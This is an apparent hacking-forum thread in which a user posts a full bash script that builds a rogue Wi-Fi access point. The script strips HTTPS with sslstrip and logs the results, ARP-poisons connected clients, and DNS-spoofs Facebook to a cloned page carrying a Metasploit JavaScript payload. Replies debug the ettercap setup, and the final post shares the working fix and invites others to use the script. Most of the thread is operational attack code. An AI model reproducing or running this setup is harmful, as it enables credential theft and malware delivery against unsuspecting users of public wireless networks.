Results 1 to 7 of 7

Thread: SoftAP with DNS spoofing. Ettercap kills connectivity?

  1. #1
    Just burned his ISO
    Join Date
    Dec 2010
    Posts
    15

    Question SoftAP with DNS spoofing. Ettercap kills connectivity?

    So I gave up trying to get other peoples SoftAP scripts working, and I decided to write my own. I've got the base functionality working near perfectly now, and even added SSLstrip capabilities, but upon expanding further, I've run across a problem that's been giving me migraines. Perhaps someone could help?

    So far everything's working except for Ettercap DNS spoofing. For the proof of concept I'm trying to spoof Facebook to a cloned page with an embedded Metasploit javascript payload.

    After the Ettercap portion of my script runs, I can run nslookup on my laptop and confirm that Facebook has indeed been spoofed to my BT4 box running the script.

    The problem is that even though Facebook gets spoofed, every other webpage fails to load at that point. Ettercap spoofs one page and kills the rest? That can't be right... Any help would be very appreciated.

    Here's the script for those who're interested:
    Code:
    #Cleanup and obfuscation
    killall -9 dhcpd airbase-ng airmon-ng sslstrip tail
    airmon-ng stop wlan0
    airmon-ng stop mon0
    airmon-ng start wlan0
    ifconfig eth0 down
    ifconfig wlan0 down
    ifconfig mon0 down
    macchanger -r eth0
    macchanger -m 00:22:C3:4A:D9:C4 wlan0
    macchanger -m 00:22:C3:4A:D9:C4 mon0
    ifconfig eth0 up
    ifconfig wlan0 up
    ifconfig mon0 up
    #Connects to AP 192.168.1.1 netmask 255.255.255.0 through eth0 with DNS server 192.168.1.1
    ifconfig eth0 192.168.1.109
    route add default gw 192.168.1.1 eth0
    echo nameserver 192.168.1.1 > /etc/resolv.conf
    #Auto creates and configures dhcpd.conf for later settings.
    echo "ddns-update-style ad-hoc;
    default-lease-time 600;
    max-lease-time 7200;
    authoritative;
    subnet 192.168.2.128 netmask 255.255.255.128 {
    option subnet-mask 255.255.255.128;
    option broadcast-address 192.168.2.255;
    option routers 192.168.2.129;
    option domain-name-servers 192.168.2.129;
    range 192.168.2.130 192.168.2.140;
    }" > dhcpd.conf
    #Enable tunneling for later routing
    modprobe tun &
    #Start the access point with BSSID 00:1A:B2:3D:C4:5D and ESSID SoftAP on channel 1 via mon0
    xterm -e airbase-ng -e "SoftAP" -c 6 -v mon0 &
    sleep 8
    #To respond to !ALL! essid probes use: "xterm -e airbase-ng -P -C 15 -e "(ESSID)" -c 1 -v mon0 &" !!ILLEGAL!!
    #Brings up the tap interface created by airbase-ng and assigns it an IP, netmask, and route
    ifconfig at0 up
    ifconfig at0 192.168.2.129 netmask 255.255.255.128
    route add -net 192.168.2.128 netmask 255.255.255.128 gw 192.168.2.129
    #Gives dhcpd the permissions it needs
    mkdir -p /var/run/dhcpd && chown dhcpd:dhcpd /var/run/dhcpd
    echo > '/var/lib/dhcp3/dhcpd.leases'
    #Runs DHCP server for SoftAP
    xterm -e dhcpd3 -d -f -cf /root/dhcpd.conf -pf /var/run/dhcpd/dhcpd.pid at0 &
    sleep 5
    #Enable IP forwarding
    echo 1 > /proc/sys/net/ipv4/ip_forward
    #iptables rules
    iptables --flush
    iptables --table nat --flush
    iptables --delete-chain
    iptables --table nat --delete-chain
    iptables -P FORWARD ACCEPT #delete if necessary / redundant later
    iptables --table nat --append POSTROUTING --out-interface eth0 -j MASQUERADE
    iptables --append FORWARD --in-interface at0 -j ACCEPT #?
    iptables -t nat -A PREROUTING -p udp -j DNAT --to 192.168.1.1
    #Thanks to Anonymous of (REDACTED)chan.org/b for these last two rules!
    iptables -A OUTPUT -j ACCEPT -m state --state NEW,ESTABLISHED,RELATED -o at0 -p tcp -m multiport --dports 80,443 --sport 1024:65535
    iptables -A INPUT -j ACCEPT -m state --state ESTABLISHED,RELATED -i at0 -p tcp
    #End of contribution
    #Enables http and https traffic to be redirected to sslstrip on port 8080
    iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080
    #Launches sslstrip, listening on port 8080 for redirected packets
    xterm -e /usr/bin/./sslstrip -l 8080 -w /root/sslstrip.log &
    sleep 5
    #Launches a new terminal that will interactively display the contents of sslstrip.log as it grows
    xterm -e tail -f /root/sslstrip.log &
    #Buggy ettercap page redirect
    echo
    echo "Run SET, and make a cloned webpage of facebook with a javascript payload"
    echo
    echo "facebook.com A 192.168.2.129" >> /usr/share/ettercap/etter.dns
    echo "*.facebook.com A 192.168.2.129" >> /usr/share/ettercap/etter.dns
    echo "www.facebook.com PTR 192.168.2.129" >> /usr/share/ettercap/etter.dns
    read -p "Press any key after a client connects to continue."
    echo "Running ettercap to redirect facebook to 192.168.2.129"
    xterm -e ettercap -i at0 -T -q -P dns_spoof -M arp /192.168.2.129/ /192.168.2.130/ &
    sleep 5
    echo 1 > /proc/sys/net/ipv4/ip_forward
    cat /proc/sys/net/ipv4/ip_forward
    EOF
    Last edited by AzraelSepultura; 01-05-2011 at 04:17 AM. Reason: Edited to re-enable IP forwarding at end of script, and change ettercap command to include "-M arp" per the discovered fix

  2. #2
    Administrator sickness's Avatar
    Join Date
    Jan 2010
    Location
    Behind the screen.
    Posts
    2,921

    Default Re: SoftAP with DNS spoofing. Ettercap kills connectivity?

    This is why it's best to do these things manually so you can troubleshoot if something goes wrong.

    Try doing a dns_spoof with ettercap and see if it works than you can compare it to what the script does and see what the problem is.
    Back|track giving machine guns to monkeys since 2007 !

    Do not read the Wiki, most your questions will not be answered there !
    Do not take a look at the: Forum Rules !

  3. #3
    Senior Member LHYX1's Avatar
    Join Date
    Sep 2010
    Location
    Belgium
    Posts
    127

    Default Re: SoftAP with DNS spoofing. Ettercap kills connectivity?

    Did you modify the etter.conf file ?
    And can't it be that it's somekind of a forwarding problem ? I understand that the only webpage that works is the one you are dns spoofing. Try spoofing every webpage and see what happens. I have also been playing with these scripts and I couldn't see any webpage untill I started dns spoofing. I saw the webpages but they didn't get redirected to my webpage.
    (my dhcp.conf file and my portforwarding setup were basicly the same as yours)

  4. #4
    Just burned his ISO
    Join Date
    Dec 2010
    Posts
    15

    Default Re: SoftAP with DNS spoofing. Ettercap kills connectivity?

    I have previously used Ettercap to successfully spoof Facebook on the same laptop that is wirelessly connected to the real AP with eth0 as my "attack box" interface with:

    Code:
    ettercap -i eth0 -T -q -P dns_spoof -M arp /Router IP/ /Laptop IP/
    The real difficulty comes from translating this to my SoftAP interface at0. Including the -M arp switch/argument ends up not spoofing Facebook, and killing all other connectivity, while

    Code:
    ettercap -i at0 -T -q -P dns_spoof /192.168.2.129/ /192.168.2.130/
    Does spoof Facebook, but kills all other connectivity. It may be a forwarding issue though... I may be wrong, but I thought that configuring IP tables manually would make editing the etter.conf file unnecessary.

  5. #5
    Very good friend of the forum killadaninja's Avatar
    Join Date
    Oct 2007
    Location
    London, United Kingdom.
    Posts
    526

    Default Re: SoftAP with DNS spoofing. Ettercap kills connectivity?

    Plenty of mistakes.

    Why do you not just change the ettercap adapater in SET`s config and set up a fake AP afterwards?

    #Thanks to Anonymous of (REDACTED)chan.org/b for these last two rules
    Well I wouldnt if I were you.

    Your script says tcp, one two many times. Could look SO MUCH simpler

    And can't it be that it's somekind of a forwarding problem ?
    The answer to that question is in it`s following statement.

    I understand that the only webpage that works is the one you are dns spoofing
    6.32 AM right now, and even robots need sleep so ill help you out tomorrow.
    Last edited by killadaninja; 01-03-2011 at 08:21 PM.
    Sometimes I try to fit a 16-character string into an 8–byte space, on purpose.

  6. #6
    Just burned his ISO
    Join Date
    Dec 2010
    Posts
    15

    Default Re: SoftAP with DNS spoofing. Ettercap kills connectivity?

    Thanks a million Killa As you can no doubt tell by my clumsy scripting, I am -very- new to this. I'm surprised I've got it working as well as it is. Not entirely sure on how to automate SET into it yet. I'll figure it out eventually, but clearly I've got some bugs to iron out before I proceed to make things more complicated/elegant.

    Also @ LHYX1, I ran my fully working base SoftAP script (No attack addons) and set up ettercap to spoof ALL DNS queries to my SoftAP's IP hosting the cloned Facebook, and as I thought, it worked like a charm using:
    Code:
    ettercap -i at0 -T -q -P dns_spoof -M arp:oneway /192.168.2.130/
    Unfortunately I'm still at square one. Spoofing works, but it kills connectivity in the process. I've played around with the different arguments for -M arp, and tried targeting different IPs with alot of connections breaking, and no luck.

    The biggest brain-bender for me is this: Using ettercap, you need to arp poison the targets to place yourself "in the middle" for the dns spoofing to work. Understood. My SoftAP interface at0 is already in the middle of the laptop and the real AP that acts as the gateway and DNS server... I can't arp poison across subnets, or arp poison myself. But there's got to be a way to do this, otherwise things like Killa's script and FakeAP_pwn wouldn't exist.

  7. #7
    Just burned his ISO
    Join Date
    Dec 2010
    Posts
    15

    Exclamation Problem solved

    Phew. After spending most of the day troubleshooting and manually launching attacks on my real AP, and then on my softAP I finally figured out the discrepancy.

    A before and after
    Code:
    cat /proc/sys/net/ipv4/ip_forward
    revealed that Ettercap was disabling IP forwarding for me. (How nice of it).

    The reason for it is even in the man page, which I did search through, but in my haste overlooked it.

    I guess the only thing to do now is to re-enable it at the end of the script which you are all free and welcome to use provided you append that little "fix" at the end. At last I am free to expand it and make it interactive so to provide for different interface names and whatnot.

    Thanks, everyone for the suggestions!

    tl:dr RTFM.

Similar Threads

  1. dns spoofing ettercap
    By joker5bb in forum Beginners Forum
    Replies: 1
    Last Post: 04-08-2010, 08:49 AM
  2. Ettercap DNS Spoofing Not.. Spoofing
    By oxide in forum OLD Newbie Area
    Replies: 4
    Last Post: 04-02-2009, 10:39 PM
  3. Ettercap kills internet connection
    By Kage50 in forum OLD Newbie Area
    Replies: 8
    Last Post: 01-09-2009, 05:49 PM
  4. DNS spoofing Ettercap
    By Argaiz in forum OLD BT3final Support
    Replies: 1
    Last Post: 07-18-2008, 12:14 PM

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •